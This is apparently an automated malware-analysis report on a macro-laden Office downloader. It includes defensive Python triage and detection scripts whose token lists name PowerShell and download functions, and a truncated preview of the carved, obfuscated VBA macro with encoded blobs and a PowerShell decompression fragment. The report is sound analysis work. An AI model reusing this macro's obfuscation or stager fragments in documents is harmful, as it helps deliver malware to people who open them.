MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying a VBA macro. The macro is heavily obfuscated: the extracted source is padded with Select Case blocks whose selector variables are never assigned (an unassigned Variant is Empty, so none of the numeric Case arms can match), and the live statements reduce to calls to a single decoder routine, hblGa, applied to 13 long base64-like blobs. One of those blobs exposes a case-mangled PowerShell fragment in clear text ([System.IO.Compression.CompressionMode]::Decompress, [Text.Encoding]::ASCII, .ReadToEnd()), which is consistent with a stager that decompresses and runs a second-stage payload; together with the CreateObject call flagged by the heuristics, this points to a downloader. The ClamAV detection Doc.Malware.Emodldr-10025032-0 supports that verdict. The macro is VBA, so T1059.005 applies; delivery as a document the user must open maps to T1204.002.
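As an added illustration (not code from this report or its analyzer), the following Python script performs the triage a practitioner would run on the carved macros.bas: it drops the Select Case padding whose selector variable is never assigned, pulls out every call to the decoder routine hblGa together with its two numeric arguments, and flags blobs that expose .NET/PowerShell stager tokens in clear text. The excerpt it runs on is constructed from the macro preview further down this page; the meaning of hblGa's numeric arguments is not known without the routine's body, so the script only records them.

```python
"""Static triage of an obfuscated VBA macro: dead-code removal and decoder-call extraction."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed excerpt modelled on the macro preview in this report (not the
# full 46549-byte macros.bas): dead Select Case padding interleaved with calls
# to the decoder routine hblGa(blob, n1, n2). The first blob carries the
# case-mangled PowerShell fragment that is visible in the preview.
SAMPLE_VBA = """Function SWauqtbXEYC()
On Error Resume Next
Select Case HzwjHG
Case 96503
nVRUaU = 77103
ETZCAG = Sqr(32686)
Case 30823
dXTWPz = CSng(Eshrip)
TMUOO = HPQiR
End Select
ivWUdpOGs = hblGa("nMmY4KPqX707w791/') , [sYstEm.Io.cOmPRESsION.ComPRESsioNMOdE]::decOMPRESS ) ), [text.eNcOdiNG]::aSCiI) ).ReAdtOEnD( ) QuDRA", 3, 116)
Select Case GNbmBi
Case 66396
djiIYY = 49271
inwNP = Sqr(14848)
Case 11609
jsCtbO = CSng(oEard)
GfJwsi = hMpqwr
End Select
UsmdvB = hblGa("r0UU/FSxwEj/eIujm+vF689Rl", 3, 19)
End Function
"""

# .NET / PowerShell tokens that point at an in-memory stager. Matching is done
# on lowercased text because the fragment in the sample is deliberately
# case-mangled. The list is illustrative, not the analyzer's own.
STAGER_TOKENS = (
    "system.io.compression", "compressionmode", "decompress", "memorystream",
    "text.encoding", "frombase64string", "readtoend", "invoke-expression",
    "downloadstring", "net.webclient", "powershell",
)

# A whole `Select Case <ident> ... End Select` block (non-nested).
_SELECT_BLOCK = re.compile(
    r"^[ \t]*Select Case[ \t]+(\w+)[ \t]*\r?\n.*?^[ \t]*End Select[ \t]*\r?\n",
    re.S | re.M,
)


def strip_junk_select_blocks(src: str) -> tuple[str, int]:
    """Drop Select Case blocks whose selector variable is never assigned.

    An unassigned Variant is Empty, so none of the numeric Case arms can ever
    match: the block is dead padding. Returns (cleaned source, blocks removed).
    """
    removed = 0

    def keep_or_drop(m: re.Match) -> str:
        nonlocal removed
        selector = m.group(1)
        assigned = re.search(
            r"^[ \t]*(?:Set[ \t]+)?" + re.escape(selector) + r"[ \t]*=", src, re.M
        )
        if assigned:
            return m.group(0)
        removed += 1
        return ""

    return _SELECT_BLOCK.sub(keep_or_drop, src), removed


@dataclass
class DecoderCall:
    target: str            # variable that receives the decoded value
    blob: str              # raw encoded string passed to the decoder
    arg1: int              # numeric decoder parameters; semantics unknown
    arg2: int              # without hblGa's body (assumption: key/length-like)
    tokens: tuple[str, ...]  # stager tokens visible in clear text in the blob


def extract_decoder_calls(src: str, decoder: str = "hblGa") -> list[DecoderCall]:
    """Collect every `<var> = decoder("<blob>", n1, n2)` statement in the source."""
    pattern = re.compile(
        r"^[ \t]*(\w+)[ \t]*=[ \t]*" + re.escape(decoder)
        + r'\("([^"]*)",[ \t]*(\d+),[ \t]*(\d+)\)',
        re.M,
    )
    calls = []
    for m in pattern.finditer(src):
        blob = m.group(2)
        low = blob.lower()
        tokens = tuple(t for t in STAGER_TOKENS if t in low)
        calls.append(DecoderCall(m.group(1), blob, int(m.group(3)), int(m.group(4)), tokens))
    return calls


def triage(src: str, decoder: str = "hblGa") -> dict:
    """Run both passes and summarise what an analyst should look at first."""
    cleaned, removed = strip_junk_select_blocks(src)
    calls = extract_decoder_calls(cleaned, decoder)
    return {
        "junk_blocks_removed": removed,
        "decoder_calls": len(calls),
        "flagged_calls": [(c.target, c.tokens) for c in calls if c.tokens],
        "cleaned_source": cleaned,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["cleaned_source"])
    print(result["junk_blocks_removed"], "junk blocks removed;",
          result["decoder_calls"], "decoder calls found")
    for target, tokens in result["flagged_calls"]:
        print(f"{target}: {', '.join(tokens)}")
```

On the constructed excerpt the script removes both padding blocks, leaves two decoder calls, and flags only the first because its blob exposes the decompression and ReadToEnd tokens; the second blob is opaque and would need the decoder itself to be run or reimplemented.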
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): the macro defines an AutoOpen entry point, so it runs as soon as the document is opened with macros enabled.
- CreateObject call (high, OLE_VBA_CREATEOBJ): the macro calls CreateObject, which instantiates COM objects that can run commands or fetch content.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no visible source is available.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that olevba did recover a VBA project from this sample (see the carved macros.bas below), so this marker adds little beyond the AutoOpen finding above.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that appears in any document carrying DrawingML content; it is not a network indicator.
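The following Python is an added example (not the analyzer's own implementation) of the token co-occurrence check that OLE_VBA_PCODE_AUTOEXEC_EXEC describes: a stream is flagged only when an auto-execution name and an execution/download capability both appear, with identifiers matched case-insensitively in both ASCII and UTF-16LE, since either encoding can occur in module and cache streams. The token lists and the three byte strings it scans are constructed for the example; scan_ole_file assumes the olefile package is installed.

```python
"""Auto-exec plus execution-token co-occurrence check over raw VBA streams."""
from __future__ import annotations

from dataclasses import dataclass

# Auto-execution entry points and execution/download capabilities to look for.
# Illustrative lists; the report's heuristic may use a different vocabulary.
AUTOEXEC_TOKENS = (
    "AutoOpen", "AutoExec", "AutoClose", "AutoNew", "Auto_Open",
    "Document_Open", "Workbook_Open",
)
EXEC_TOKENS = (
    "Shell", "ShellExecute", "CreateObject", "GetObject", "WScript.Shell",
    "URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream", "powershell",
)


def _encodings(token: str) -> tuple[bytes, bytes]:
    """Identifiers in VBA module and cache streams may be stored as ASCII or UTF-16LE."""
    return token.encode("ascii"), token.encode("utf-16-le")


def find_tokens(data: bytes, tokens) -> list[str]:
    """Case-insensitive substring search over the raw stream.

    bytes.lower() only folds ASCII letters, so it works for both encodings
    (the interleaved NUL bytes of UTF-16LE are left untouched). Short tokens
    such as "Shell" are noisy on their own; that is why the rule requires an
    auto-exec token as well before it fires.
    """
    low = data.lower()
    return [tok for tok in tokens if any(enc.lower() in low for enc in _encodings(tok))]


@dataclass
class PcodeFinding:
    autoexec: list
    exec_: list

    @property
    def matched(self) -> bool:
        # Both halves are required: auto-exec alone is a benign template trait,
        # execution tokens alone are common in legitimate automation.
        return bool(self.autoexec) and bool(self.exec_)


def scan_stream(data: bytes) -> PcodeFinding:
    return PcodeFinding(find_tokens(data, AUTOEXEC_TOKENS), find_tokens(data, EXEC_TOKENS))


def scan_ole_file(path: str) -> dict[str, PcodeFinding]:
    """Apply scan_stream to every stream of an OLE2 container; returns only hits.

    Assumes the olefile package is available; it is imported lazily so the
    rest of the module runs without it.
    """
    import olefile

    hits = {}
    ole = olefile.OleFileIO(path)
    try:
        for entry in ole.listdir(streams=True, storages=False):
            finding = scan_stream(ole.openstream(entry).read())
            if finding.matched:
                hits["/".join(entry)] = finding
    finally:
        ole.close()
    return hits


# Constructed stand-ins for three VBA streams (not bytes from the sample).
STREAM_AUTOEXEC_AND_EXEC = (
    b"\x00\x01\xff" * 4 + b"AutoOpen" + b"\x07\x00" * 3
    + "CreateObject".encode("utf-16-le") + b"\x00" + b"WScript.Shell" + b"\x1a"
)
STREAM_AUTOEXEC_ONLY = b"\x02\x00Document_Open\x00\x00MsgBox\x00"
STREAM_EXEC_ONLY = b"Sub Helper()\x00" + "Shell".encode("utf-16-le") + b"\x00\x00"


if __name__ == "__main__":
    for name, blob in (("auto+exec", STREAM_AUTOEXEC_AND_EXEC),
                       ("auto only", STREAM_AUTOEXEC_ONLY),
                       ("exec only", STREAM_EXEC_ONLY)):
        f = scan_stream(blob)
        print(f"{name}: matched={f.matched} autoexec={f.autoexec} exec={f.exec_}")
```

Only the first constructed stream fires: it carries AutoOpen in ASCII and CreateObject in UTF-16LE. The other two each satisfy one half of the rule and are reported as non-matches, which is the behaviour that keeps this heuristic from flagging every document with an AutoOpen stub or every macro that calls Shell.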
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46549 bytes |

SHA-256: 5290e0c6df65a9c6c63fec4cfb835e5357306c561551114634e6a8d51523aacb

Detection on the carved artifact:
- ClamAV: no threats found. ClamAV flagged the original document, not the decoded macro source, so a clean result on macros.bas does not weaken the verdict.
- Obfuscation or payload: likely. The carved artifact contains 13 long base64-like blobs.
Preview of the extracted script (first 1,000 lines; the listing below is truncated). olevba concatenates all recovered modules, so the listing opens with the attributes of the ThisDocument stream followed by the module zAjclPaXiwkzu that holds the decoder calls.
Attribute VB_Name = "rIXpwWNrWaszR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zAjclPaXiwkzu"
Function SWauqtbXEYC()
On Error Resume Next
Select Case HzwjHG
Case 96503
nVRUaU = 77103
ETZCAG = Sqr(32686)
Case 30823
dXTWPz = CSng(Eshrip)
TMUOO = HPQiR
End Select
ivWUdpOGs = hblGa("nMmY4KPqX707w791/') , [sYstEm.Io.cOmPRESsION.ComPRESsioNMOdE]::decOMPRESS ) ), [text.eNcOdiNG]::aSCiI) ).ReAdtOEnD( ) QuDRA", 3, 116)
Select Case GNbmBi
Case 66396
djiIYY = 49271
inwNP = Sqr(14848)
Case 11609
jsCtbO = CSng(oEard)
GfJwsi = hMpqwr
End Select
Select Case KJzFOS
Case 19930
BwidH = 24117
ATjRN = Sqr(28096)
Case 17021
mmHHG = CSng(VaLcjj)
CTXJcv = uGDrW
End Select
UsmdvB = hblGa("r0UU/FSxwEj/eIujm+vF689Rl", 3, 19)
Select Case vUqcOX
Case 3664
MTGKEP = 62151
SAXdk = Sqr(95786)
Case 99897
IlSqV = CSng(iPkQAA)
iOMhjq = RwXjmZ
End Select
Select Case AfVAD
Case 49987
zlTkdU = 95660
pNnsI = Sqr(25980)
Case 20226
DWpOi = CSng(IjpJG)
IhREX = rjQam
End Select
VhIdmV = hblGa("PaFBkrDtjGRhigPu6x3IOAkcpxvDPp+/Papqh5bUYSG@4DD", 5, 38)
Select Case JUztHq
Case 36211
pKSdOL = 12765
dnvTNr = Sqr(235)
Case 15619
iUuVbE = CSng(kqEOYP)
zqIQz = nqMHQ
End Select
Select Case RLYaJ
Case 37838
YDWqd = 25160
cZwdm = Sqr(55644)
Case 36314
fJHOi = CSng(BkSvv)
RiHPIc = IJPjQQ
End Select
POKDVP = hblGa(".7tJ,B+sTV75+Kd6uHTdb1N3x7PjCPs5Lj2OtcyPxwDilB/w8vbZ6/qHDLeMeCgcj8sPjCeJx7fXdveDR8cFzoY/Il3UgrsDPg9ZDb9DHMXB+UJw9z5O4AA760o+DWht", 7, 119)
Select Case zsXTjT
Case 92598
fPSvlv = 45520
DviNz = Sqr(95544)
Case 34218
UKCKJP = CSng(rzHTIN)
ObDSzs = MrfkqL
End Select
Select Case wsCPUO
Case 88133
SEhzo = 68073
dPjPJ = Sqr(78908)
Case 28787
EXKEK = CSng(uoCBP)
zwnjsw = cGqOGh
End Select
vzhARl = hblGa("FMdI/KfpN9Ep9q8DXr31q+qhJvK8ZPPT6yjqwz+7vWXK7E+yCdq5kP60bdi/SjnKt5LmRdiC8+CvjN8zOSnxP4zqPyGKov8KfBiDfovvfNONfyPKS/qsR3E08qzYfpy2uT/Y/zakr/S5050CeyD6w/eHuQrh+k671Onyi2tb", 4, 161)
Select Case XtATw
Case 98636
mzrKJj = 84817
QivYF = Sqr(3122)
Case 63383
AXMqmA = CSng(JDWIp)
njFQv = zwViN
End Select
Select Case CnpHU
Case 3559
MQQQt = 23382
zzlOwc = Sqr(89551)
Case 82376
Sjkhkz = CSng(YcDSBw)
IIXIA = WFNYuR
End Select
rzVSzJmfc = hblGa("D5Chdr6gPuobcOp98fdT3wfxd3xBXJXijv7+wP6qztHjiN0+zBv8GQiXI8+jFn6C49frZMxn1VAPGF/Q+0rfixfE+0g60fN1c/CkFh+Aw41wLn4T3+AjnWdbc", 3, 115)
Select Case vbpPZL
Case 83583
bjUYM = 62972
nqtdBa = Sqr(54968)
Case 12992
UuwYN = CSng(MnSVo)
nntpEA = YCjnLf
End Select
Select Case MKjVhA
Case 14264
UHcdA = 89651
owqihr = Sqr(4258)
Case 24575
OKLZWw = CSng(qJvQK)
BFsDMF = lhqPW
End Select
EPFiPnYO = hblGa("Bhwrgs2a6+82riyte7Cbxubx+qN/ftfa0f6o7M9oV3bT+udfbFxb3drIxlObtdc7G5utorU2ibZqbGDjaMGfS+tmrfXwGtO+k/RcY882wXNbP28WrbTxzoKl/SaV758+X/p+Q183t7Rfeg3xeuOfp+c2Nlmm832/yPP93Mg4Zr4pi@NcN", 4, 168)
Select Case YbzcsJ
Case 95286
HWpio = 45468
mUEiXu = Sqr(92785)
Case 70240
ifwvpj
... (truncated)